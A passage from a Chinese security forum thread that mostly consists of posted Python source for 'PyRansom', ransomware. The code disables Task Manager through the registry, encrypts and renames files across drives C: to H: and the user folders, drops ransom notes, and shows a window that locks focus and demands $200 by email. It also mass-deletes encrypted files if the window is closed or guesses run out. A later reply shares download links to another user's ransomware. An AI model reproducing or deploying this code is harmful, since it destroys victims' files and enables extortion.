  61.         filess.write('Windows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]\r\n"DisableTaskMgr"=dword:02')
  62.         filess.close()
  63.         os.popen(f'start /B regedit /S C:/Users/{user}/Documents/tkmgr.reg')
  64.     except:
  65.         pass
  66. def huan():
  67.     global user
  68.     try:
  69.         filed = open(f'C:/Users/{user}/Documents/tkmgr.reg','w')
  70.         filed.write('Windows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]\r\n"DisableTaskMgr"=dword:00')
  71.         filed.close()
  72.         os.popen(f'start /B regedit /S C:/Users/{user}/Documents/tkmgr.reg')
  73.     except:
  74.         pass
  75. jing()
  76. me.showerror("Microsoft Visual C++ Runtime Error","Runtime error!")
  77. mulu = ['C:/','D:/','E:/','F:/','G:/','H:/',f'C:/Users/{user}/desktop/',f'C:/Users/{user}/',f'C:/Users/']
  78. def lib(mulu):
  79.     def path(path):
  80.         try:
  81.             for file in os.listdir(mulu+path+r"/."):
  82.                 if '.' in os.path.splitext(file)[1]:
  83.                     try:
  84.                         en(mulu+path+r'/'+file)
  85.                         os.rename(mulu+path+r'/'+file,mulu+path+r'/'+file+r".pyransom")
  86.                     except:
  87.                         os.rename(mulu+path+r'/'+file,mulu+path+r'/'+file+r".pyransom")
  88.                         pass
  89.                 else:
  90.                     pass
  91.         except:
  92.             pass
  93.     try:
  94.         for file in os.listdir(mulu+r"."):
  95.             try:
  96.                 if '.' in os.path.splitext(file)[1]:
  97.                     try:
  98.                         en(mulu+file)
  99.                         os.rename(mulu+file,mulu+file+".pyransom")
  100.                     except:
  101.                         os.rename(mulu+file,mulu+file+".pyransom")
  102.                         pass
  103.                 else:
  104.                     path(file)
  105.                     pass
  106.             except:
  107.                 pass
  108.     except:
  109.         pass
  110. def delib(mulu,ID_file):
  111.     def path(path):
  112.         try:
  113.             for file in os.listdir(mulu+path+r"/."):
  114.                 if '.' in os.path.splitext(file)[1]:
  115.                     try:
  116.                         de(mulu+path+r'/'+file,ID_file)
  117.                     except:
  118.                         pass
  119.                 else:
  120.                     pass
  121.         except:
  122.             pass
  123.     try:
  124.         for file in os.listdir(mulu+r"."):
  125.             try:
  126.                 if '.' in os.path.splitext(file)[1]:
  127.                     try:
  128.                         de(mulu+file,ID_file)
  129.                     except:
  130.                         pass
  131.                 else:
  132.                     path(file)
  133.                     pass
  134.             except:
  135.                 pass
  136.     except:
  137.         pass
  138. for i in mulu:
  139.     lib(i)
  140. for hhhh in range(1,101):
  141.     try:
  142.         oooo = open(f'C:/Users/{user}/desktop/{hhhh}.id[{ID}].icanrestore[pythonhavenoname@163.com].pyransom','w')
  143.         oooo.write('All you file have been encrypt!\r\nPlaese see the decrypt window.')
  144.         oooo.close()
  145.     except:
  146.         pass
  147. os.system('C:/PyRansom.bat')
  148. def close():
  149.     global mulu
  150.     global user
  151.     print('You cant leave!')
  152.     try:
  153.         os.remove(f'C:/Users/{user}/Documents/change.txt')
  154.     except:
  155.         pass
  156.     for deldel in mulu:
  157.         os.system(f'del /f /s /q {deldel}*.pyransom')
  158.     exit(0)
  159.     return False
  160. temp = open("icon.gif","wb+")
  161. tempb64=base64.b64decode(r'R0lGODlhQABAAPAAAAAAAAAAACH5BAEAAAAAIf8LSW1hZ2VNYWdpY2sOZ2FtbWE9MC40NTQ1NDUAIf8LWE1QIERhdGFYTVA8P3hwYWNrZXQgYmVnaW49J++7vycgaWQ9J1c1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCc/Pgo8eDp4bXBtZXRhIHhtbG5zOng9J2Fkb2JlOm5zOm1ldGEvJyB4OnhtcHRrPSdJbWFnZTo6RXhpZlRvb2wgMTIuNDAnPgo8cmRmOlJERiB4bWxuczpyZGY9J2h0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMnPgoKIDxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PScnCiAgeG1sbnM6dGlmZj0naHR0cDovL25zLmFkb2JlLmNvbS90aWZmLzEuMC8nPgogIDx0aWZmOk9yaWVudGF0aW9uPjE8L3RpZmY6T3JpZW50YXRpb24+CiA8L3JkZjpEZXNjcmlwdGlvbj4KPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKPD94cGFja2V0IGVuZD0ndyc/PgH//v38+/r5+Pf29fTz8vHw7+7t7Ovq6ejn5uXk4+Lh4N/e3dzb2tnY19bV1NPS0dDPzs3My8rJyMfGxcTDwsHAv769vLu6ubi3trW0s7KxsK+urayrqqmop6alpKOioaCfnp2cm5qZmJeWlZSTkpGQj46NjIuKiYiHhoWEg4KBgH9+fXx7enl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmFgX15dXFtaWVhXVlVUU1JRUE9OTUxLSklIR0ZFRENCQUA/Pj08Ozo5ODc2NTQzMjEwLy4tLCsqKSgnJiUkIyIhIB8eHRwbGhkYFxYVFBMSERAPDg0MCwoJCAcGBQQDAgEAACwAAAAAQABAAAAC6YSPqavhD5mctBqIs9085a914gSW0Ygi5uqkKQu7IkzLW13blCnxeg+ylH6M4O1DbBiFyKSqyVk6pcyQEwDtZInUI+aK3Xq/U3GVnOyeT2lzRS2D79wuOYkOzuv3NpqfrfMnaDc3aGgVdaiINraoqOUYGZAouUhZeXiJOai5+dfpmbMWKvpGKgjq9/TY+KlkmMoCxNla6gFbG1OEO2q7iporu0vbq/tKbMr7C1xsaxlsfMHaHB2WCS188EydLX3NvXL7naxsXX437Rh7SrjMHo79DlgoDw9ePxmPD4nfftz/4AXAgHUGIigAADs=')
  162. temp.write(tempb64)
  163. temp.close()
  164. password = str((ID+3)*2)
  165. print("Password:"+password+"    ID:"+str(ID))
  166. root = tk.Tk()
  167. def get():
  168.     global change
  169.     global user
  170.     global mulu
  171.     if change != 0:
  172.         if entry.get() == password:
  173.             for defile in mulu:
  174.                 delib(defile,'decrypt.dky')
  175.             for enen in mulu:
  176.                 os.system(f'ren {enen}*.pyransom {enen}*.')
  177.             os.remove(f'C:/Users/{user}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PyRansom.bat')
  178.             os.remove('C:/PyRansom.bat')
  179.             os.remove(f'C:/Users/{user}/Documents/tkmgr.reg')
  180.             os.remove(f'C:/Users/{user}/Documents/change.txt')
  181.             huan()
  182.             time.sleep(2)
  183.             root.destroy()
  184.         else:
  185.             change = change-1
  186.             wrtc = open(f'C:/Users/{user}/Documents/change.txt','w')
  187.             wrtc.write(change)
  188.             wrtc.close()
  189.     else:
  190.         try:
  191.             os.remove(f'C:/Users/{user}/Documents/change.txt')
  192.         except:
  193.             pass
  194.         for deldel in mulu:
  195.             os.system(f'del /f /s /q {deldel}*.pyransom')
  196.         exit(0)
  197. root.config(background = "red")
  198. photo = tk.PhotoImage(file="icon.gif")
  199. icon = tk.Label(root,image=photo)
  200. icon.pack()
  201. os.remove("icon.gif")
  202. width = 900
  203. height = 500
  204. screenwidth = root.winfo_screenwidth()
  205. screenheight = root.winfo_screenheight()
  206. alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth-width)/2, (screenheight-height)/2)
  207. root.geometry(alignstr)
  208. root.resizable(width=False,height=False)
  209. root.wm_attributes('-topmost',1)
  210. first = tk.Label(root,text="All your file have been encrypt!",bg="red")
  211. first.config(font=("Arial",20))
  212. first.pack()
  213. a = tk.Label(root,text="All your files have been encrypted due to a security problem with your PC. If you want to restore them, ",bg="red")
  214. a.config(font=("Arial",15))
  215. a.pack()
  216. c = tk.Label(root,text="write us to the e-mail:pythonhavenoname@163.com",bg="red")
  217. c.config(font=("Arial",15))
  218. c.pack()
  219. b = tk.Label(root,text="Write This ID in the title of your message:"+str(ID),bg="red")
  220. b.config(font=("Arial",15))
  221. b.pack()
  222. d = tk.Label(root,text="You should pay 200$ to us.",bg="red")
  223. d.config(font=("Arial",15))
  224. d.pack()
  225. e = tk.Label(root,text="If you pay,we will send you decrypt password.",bg="red")
  226. e.config(font=("Arial",15))
  227. e.pack()
  228. cv = tk.Label(root,text="And,if you shut down your PC or try decrypt you file,all you data will never cant restore!",bg="red")
  229. cv.config(font=("Arial",15))
  230. cv.pack()
  231. try:
  232.     checkc = open(f'C:/Users/{user}/Documents/change.txt','r')
  233.     change = int(checkc.read())
  234.     checkc.close()
  235.     dddh = tk.Label(root,text="(Oh,you restart your PC!)",bg="red")
  236.     dddh.config(font=("Arial",15))
  237.     dddh.pack()
  238. except:
  239.     pass
  240. zh = tk.Label(root,text="Finally,don't remove or move 'decrypt.dky'! Because it's your decrypt key!",bg="red")
  241. zh.config(font=("Arial",15))
  242. zh.pack()
  243. zht = tk.Label(root,text="if your remove it,all you data will never cant restore!(decryptor will error exit!)",bg="red")
  244. zht.config(font=("Arial",15))
  245. zht.pack()
  246. f = tk.Label(root,text="Remember,you only have "+str(change)+" change.",bg="red")
  247. f.config(font=("Arial",15))
  248. f.pack()
  249. info = tk.Label(root,text="Come on! Input Password:",bg="red")
  250. info.config(font=("Arial",15))
  251. info.pack()
  252. entry = tk.Entry(root,width=100)
  253. entry.pack()
  254. ok = tk.Button(root,text="Now Decrypt",command=get)
  255. ok.pack(side="bottom")
  256. root.protocol("WM_DELETE_WINDOW",close)
  257. root.overrideredirect(True)
  258. root.mainloop()
复制代码

我想看看他是怎样评价我的勒索的
huangzihang
发表于 2023-3-13 21:39:03 | 显示全部楼层
python无名氏 发表于 2023-3-13 21:37
出现了,标准的chatgpt话术!
帮我问一下这些代码:

这是一个加密勒索病毒,建议立即断开网络并扫描病毒。请不要尝试运行此代码,以免给您的设备带来危害。
这个勒索程序看起来是用Python编写的。
python无名氏
发表于 2023-3-13 21:40:27 | 显示全部楼层
huangzihang 发表于 2023-3-13 21:39
这是一个加密勒索病毒,建议立即断开网络并扫描病毒。请不要尝试运行此代码,以免给您的设备带来危害。
...

PyRansom嘛我发过贴的
wwwab
 楼主| 发表于 2023-3-13 22:17:57 | 显示全部楼层

体验体验我的

勒索(手动输入路径,仅供学习交流测试):https://share.weiyun.com/ytTzWYKj
文件拓展名批量修改工具:https://pan.huang1111.cn/s/Z3ldcL
python无名氏
发表于 2023-3-13 22:20:14 | 显示全部楼层
wwwab 发表于 2023-3-13 22:17
体验体验我的

勒索(手动输入路径,仅供学习交流测试):https://share.weiyun.com/ytTzW ...

兄啊,没密码啊
别用微云了,用huang1111吧批量修改器可以用bat实现的,我就做过...

评分

参与人数 1人气 +1 收起 理由
wwwab + 1 dkhacr

查看全部评分

wwwab
 楼主| 发表于 2023-3-13 22:22:14 | 显示全部楼层
python无名氏 发表于 2023-3-13 22:20
兄啊,没密码啊
别用微云了,用huang1111吧批量修改器可以用bat实现的,我就做过...

不不不,我的修改工具是带UI、支持中文的,用tkinter和os.rename实现的,有百行代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 05:01 , Processed in 0.120498 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表